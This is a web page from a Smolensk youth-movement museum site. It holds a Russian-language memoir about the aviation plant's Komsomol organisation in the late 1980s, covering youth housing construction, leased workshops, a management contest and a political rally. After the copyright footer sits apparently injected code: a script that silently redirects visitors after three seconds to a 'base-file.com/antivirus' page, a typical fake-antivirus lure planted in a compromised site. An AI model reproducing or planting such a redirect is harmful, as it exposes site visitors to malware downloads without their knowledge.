Так это было
 
 

 

Сборник "Так это было. Смоленский комсомол 1960-80 годов в воспоминаниях современников"


Литература
Так это было

"Так это было.
Смоленский
комсомол 1960-80
годов в воспоминаниях
современников"
Дети и молодёжь Смоленщины 1920-1930-е годы
Дети и молодёжь
Смоленщины
1920-1930-е годы

Спонсоры музея истории молодежного движения

 

Выражаем огромную благодарность людям, которые приняли и принимают участие в жизни музея и комплектации его фондов.


       
      
 

 

Владимир Игоревич Саморуков,
секретарь комитета ВЛКСМ с правами райкома
Смоленского авиационного завода с 1989 по 1990 год.

В.И. Саморуков

 
 

НА ПЕРЕЛОМЕ

(Воспоминания о работе первичной комсомольской организации конца 80-х)

Как и многие ребята 70-х годов, учась в школе, я считал комсомол совершенно ненужной организацией, существующей своей отдельной, идеализированной жизнью и вспоминающей о молодежи только тогда, когда нужно кого-либо разобрать, проработать, рекомендовать или собрать взносы. Даже принимали в нее первыми только лучших с точки зрения учителей, а потом по накатанной дорожке и всех остальных, все более для отчетности.
Испытывая внутреннее несогласие с этим, я вступил в комсомол одним из последних в классе, в основном, видимо, для того, чтобы не возникли проблемы при поступлении в институт. Мое отношение к комсомолу мало изменилось и во время учебы в институте, и в первые годы работы на Смоленском авиационном заводе. О комсомоле вспоминали только при проведении аттестаций, субботников и дежурств ОКОД (оперативного комсомольского отряда дружинников). О большинстве тех дел и мероприятий, которые проводила комсомольская организация, я, к сожалению, узнал только после перехода на работу в комсомол. Виной этому, по-моему, была плохая информационная работа и то, что большинство дел зарождалось не в первичных организациях, а, по стереотипу, спускались «сверху».
Во второй половине 80-х проводимая перестройка стала изменять политическую жизнь в стране. Вместе с этим стала претерпевать изменения и комсомольская организация.
С началом гласности и демократизации многие молодые люди перестали связывать свое дальнейшее положение в обществе с членством в ВЛКСМ, и ряды организации стали резко уменьшаться. Но при этом комсомол продолжал оставаться практически единственной молодежной организацией, имеющей вес во властных структурах.
В стране ломались старые стереотипы мышления. У молодых людей рождалась масса инициативных предложений, которые в одиночку реализовать было невозможно, и большинство потянулись именно к комсомолу.
В конце 1988 года, после окончания еженедельного совещания секретарей первичных комсомольских организаций, меня попросил остаться секретарь комитета ВЛКСМ завода Игорь Лупинос. После недолгой беседы мне было предложено перейти на работу заместителем секретаря комитета ВЛКСМ. Он пообещал, что работа будет нелегкой, а перспективы неизвестны (старая система продвижения «наверх» ломалась). Но будем стараться заниматься только конкретными делами. Трудно сказать, что тогда повлияло на мое решение, но, после нескольких дней колебаний, я согла­сился.
В это время перед комитетом ВЛКСМ стояла задача, с одной стороны, поддержать и помочь реализоваться как можно большему числу интересных идей, с другой стороны, привлечь к ним по возможно­сти больше молодежи.
По инициативе комитета ВЛКСМ и при его поддержке были организованы новые направления, такие как МЖК (молодежные жилищные комплексы), фонд молодежи, арендные молодежные цеха, культурно-спортивные центры, военно-патриотический клуб, проводились конкурсы и обучение молодых специалистов, КВНы. Продолжали проводиться ставшие традиционными турслеты, конкурсы профмастерства, поисковые работы.
Поддерживалось практически каждое интересное предложение молодежи, вплоть до полубредовых.
Но при всем при этом, чтобы продолжать оставаться организацией, имеющей реальную силу, нам приходилось бороться за каждого комсомольца, привлекать и заинтересовывать всем, что делалось, как можно больше молодых людей.
Для этого мы пошли в первички. Собрания первичных комсомольских организаций перестали быть формальностью. Практически на каждом собрании присутствовали члены комитета ВЛКСМ. Мы рассказывали о том, что делаем и что можем сделать, чтобы заинтересовать молодежь. И она к нам шла.
Вся эта деятельность требовала и определенных финансовых вложений, которые надо было где-то брать, и нам пришлось заняться их зарабатыванием.
С большим трудом на заводе был создан фонд молодежи, а для собственной хозяйственной деятельности был образован молодежный центр.
К сожалению, вся эта деятельность не нашла понимания не только у многих работников заводской администрации, но и у комсомольских активистов старшего поколения.
Но об этом чуть позже, а сейчас я хочу чуть более подробно рассказать о некоторых направлениях, которыми занималась наша комсомольская организация.
Начну с МЖК. В описываемые мной годы (как, в принципе, и сейчас) получить молодому человеку квартиру было практически невозможно. Для этого надо было лет 15-20 отстоять в очереди. Т.е. к моменту получения квартиры молодому человеку было уже под 40 лет.
Во второй половине 80-х в стране зародилось движение МЖК. Молодые люди с отрывом от основного места работы создавали строительные отряды для возведения своего собственного жилья. Причем не за счет других очередников, а ставя перед собой цель работать с двойной отдачей, т.е. строя и для себя, и для очередников. Кроме этого, создавалась возможность поселиться в одном месте людям одного возраста и близких интересов. С учетом этого строилась и социально-бытовая структура жилья, причем в большей степени теми же бойцами МЖК в свободное от основной работы время. В таких домах жили не безразличные друг к другу люди, когда не знаешь даже соседей по этажу, а дружная семья.
Это движение зародилось на заводе еще до моего перехода на комсомольскую работу. У его истоков стояли Александр Алифанов (в то время секретарь комитета ВЛКСМ завода), Николай Новиков (зам. секретаря комитета ВЛКСМ) и ряд других комсомольцев. Ими была проделана огромная работа по решению организационно-правовых вопросов. Разработаны положение и другая документация. Из завод­ской молодежи по большому количеству критериев были отобраны бойцы первого отряда МЖК.
Не все тогда были согласны с правилами отбора, да и вообще с целесообразностью МЖК, и поэтому в последующем пришлось изменить много правил.
Во-первых, необходимо было показать, что МЖК – это не просто способ зарабатывания квартир, а совершенно новый образ жизни. За короткое время бойцы МЖК-1 стали одним сплоченным коллективом, сплоченным не только на работе, но и в повседневной жизни. Они активно участвовали в общественной жизни завода, слетах, вечерах.
Было организовано движение кандидатов в МЖК-2. Целью его стало своим трудом, своими делами доказать как заводской администрации, так и всему коллективу завода, что необходимо дать молодежи возможность построить себе квартиры и что это не будет в ущерб остальным. Были организованы так называемые субботники, на которых кандидаты в МЖК в свое личное, свободное от работы время занимались благоустройством заводского микрорайона, строительством военно-патриотического клуба, культурно-спортивного центра, была обустроена зона отдыха Скворцова дача, построены детские площадки. При участии именно комсомольской организации завода через бойцов и кандидатов в МЖК для более полного обеспечения стройки стройматериалами был взят в аренду заводской цех ЖБИ. Это был один из первых арендных цехов на Смоленщине. Наибольший вклад в него внесли Игорь Лупинос, тогда секретарь комитета ВЛКСМ, и Александр Михалик, боец МЖК-1, впоследствии ставший начальником этого цеха и награжденный за организацию работы цеха премией комсомола Смоленщины. До взятия в аренду это был один из самых неритмичных и отстающих цехов завода. После же прихода в него молодежного коллектива производительность в цехе за короткий промежуток времени возросла в несколько раз. Цех стал постоянным победителем заводских соцсоревнований, даже несмотря на мощное противодействие этому заводской администрации.
После этого был взят в аренду Гусинский кирпичный завод, что также позволило увеличить снабжение стройки стройматериалами. И вспоминая об этом, нельзя не упомянуть одного из основных организаторов – командира МЖК-2 Александра Котолевца.
За все время (и до и после этих лет) я не видел такого подъема активности молодежи. Жизнь показала, что, когда совпадали личные и общественные интересы, люди могли «свернуть горы».
Проводились конкурсы профмастерства, по результатам которых не только вручались награды, но и подавались представления на повышение разряда. Особенно хочется вспомнить о конкурсе молодых специалистов.
Находясь в командировке в г. Таллинне, Игорь Лупинос встретился с руководителями тогда еще молодой, но уже достаточно профессиональной школы менеджеров. Была достигнута предварительная договоренность о проведении у нас на заводе конкурса молодых специалистов с последующим интенсивным обучением победителей. Руководство завода восприняло это скептически и сначала противодействовало этому. Но после долгих разъяснений, обоснований, мотиваций было достигнуто соглашение на его проведение и финансирование.
И опять-таки это был первый подобный конкурс в Смоленске. В нем приняли участие более 100 человек. Конкурс включал в себя теоретические вопросы, деловые игры (позволившие каждому конкурсанту проявить свои деловые качества и оценить качества других) и имитацию реального производства с выходом реального продукта.
По результатам конкурса были отобраны наиболее проявившие себя молодые люди, для которых потом был проведен двухнедельный курс интенсивного обучения менеджменту. Все они были взяты на заметку руководством завода, и в дальнейшем это существенно отразилось на их карьере.
На базе победителей этого конкурса комитет ВЛКСМ предложил и помог создать клуб менеджеров, на заседаниях которого обсуждались многие заводские проблемы с приглашением ведущих специалистов завода.
В конце 80-х в стране все больше нарастали демократические преобразования. На смену безальтернативным выборам пришло разнообразие кандидатов.
Зная, как было трудно пробивать «наверху» каждое новое дело, мы поняли, что для более успешного решения молодежных проблем нам необходимо иметь своих представителей во властных структурах. И мы начали борьбу за эти места. После выдвижения и регистрации кандидатов в депутаты местных Советов мы (комитет ВЛКСМ) организовали в Заднепровском районе митинг в их поддержку. Тогда митинг с присутствием представителей различных политических групп трудно было себе представить. Но именно благодаря тому, что проводил его комитет ВЛКСМ, мы смогли получить разрешение на его проведение и решить все организационные вопросы. А когда один из выступающих призвал к отстранению КПСС от власти, некоторые стали перешептываться и спрашивать, а есть ли разрешение на этот митинг и чем все это закончится. Митинг прошел при большом стечении народа, на самом высоком уровне организации. Были обеспечены подиум для выступающих (им стала машина ЗИЛ), радиотрансляционная усилительная машина. Порядок обеспечивали члены ОКОД. Впоследствии, когда митинги стали входить в обыденную жизнь, к нам неоднократно приходили советоваться об особенностях их проведения представители других организаций.
По итогам выступлений на митинге была принята резолюция с предложениями по реорганизации управления в городе и области. К сожалению, обком КПСС наложил вето на ее публикацию, и нас отказалась печатать даже молодежная газета «Смена». Но все-таки митинг внес существенную лепту в то, что многие из наших представителей были избраны в Советы разных уровней.
Как я писал ранее, для того, чтобы уделять больше времени организационной и политической работе и освободиться от хозяйственных дел, при комитете ВЛКСМ был создан молодежный центр АВИА. Он взял на себя организацию работы различных хозрасчетных молодежных предприятий, привлечение к их деятельности молодежи, а также, за счет заработанных средств, финансирование социально-культурных направлений работы комитета ВЛКСМ.
Так, молодежным центром были приобретены материалы и оборудование для строительства и оснащения культурно-спортивного центра МЖК, военно-патриотического клуба «Десантник» и многое другое.
Здесь перечислена лишь небольшая часть тех мероприятий, которые проводила наша комсомольская организация.
К сожалению, как я уже говорил, многие из них не нашли понимания и поддержки у комсомольцев старшего поколения. Произошел, можно даже сказать, разрыв связи между нами и комсомольцами предыдущего поколения. Нас даже лучше понимали ветераны комсомола. А предыдущие комсомольские активисты зачастую становились противниками того, что делал комитет ВЛКСМ, они продолжали твердить, что при них комсомольцы были более организованны и работали не за интерес, а за цель. Они не хотели слушать, что в стране изменилась политическая ситуация, что страхом наказания на субботник, в колхоз, да и вообще в комсомол не загонишь, а нужно заинтересовать, привлечь, чтобы каждый молодой человек видел не только мифиче­скую общую цель, но и конкретную цель, интересующую именно его.
В начале 90-х в стране стал особенно заметен экономический и политический кризис. Этот кризис не мог не сказаться и на работе комсомольской организации и в общем на работе с молодежью. Проблем возникало все больше, и они давили со всех сторон. И одной из главных стало финансирование.
Администрации, трудовые коллективы большинства предприятий, а также руководители других общественных и советских организаций не хотели видеть проблемы молодежи. Они отгораживались от них, говоря, что для этого есть комсомол, т.е. хотели, чтобы молодежь занималась сама собой. Не задумываясь, что это наше будущее. Ряды же комсомольской организации к этому времени очень сильно поредели. Кто-то не видел там свое место, кто-то ушел в общем порыве того времени – ломать все старое, а некоторые – просто не желая платить взносы. Многие из комсомольских активистов конца 80-х подошли к верхнему пределу комсомольского возраста, и перед ними стали вставать более земные проблемы – обеспечить будущее свое и своей семьи. В стране полным ходом зарождалось предпринимательство, и большинство из них нашли себя там.
Не пользуясь достаточной поддержкой «сверху», а порой и при ее полном отсутствии, имея к тому же и свои внутренние противоречия, комсомолу было все труднее работать с молодежью.
Начались искания, «круглые столы», деловые игры, чтобы найти способы повышения эффективности работы.
Для уменьшения лишних звеньев стали убирать райкомы. Могли избрать делегатом на съезд не человека с серьезными предложениями и активного работника, а того, кто на конференции смог громко обругать всех и все. На комсомольскую работу попадали не за свои дела, а за былые заслуги организации, в которую входил человек. Не по воле комсомола ушли «первички» с предприятий.
Я думаю, что не что-то одно, а все это в общем и привело к кризису комсомола и «сворачиванию» его работы.
Вспоминая сейчас годы своей работы в комсомоле, могу сказать, что этот период дал мне, в смысле опыта работы с людьми, общения, знаний, не менее, чем предыдущие годы учебы в институте и работы на заводе. В это время к комсомолу тянулись наиболее инициативные молодые люди с богатым внутренним миром, массой интересных предложений. Общение и работа с ними позволили по-другому взглянуть на окружающий мир. Работа в комсомоле, в отличие от работы внутри какой-либо производственной структуры, требовала приобретения навыков общения и решения вопросов как с рядовыми комсомольцами, так и с районным и областным руководством. Т.е. эта работа была настоящей школой для молодежи.

2004 г.

 

    (c) Авторские права на сайт принадлежат ООО "Союз ДМ", Смоленской областной общественной организации Общероссийской общественной организации "Российский Союз Молодежи", 2008-2012г.  
setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>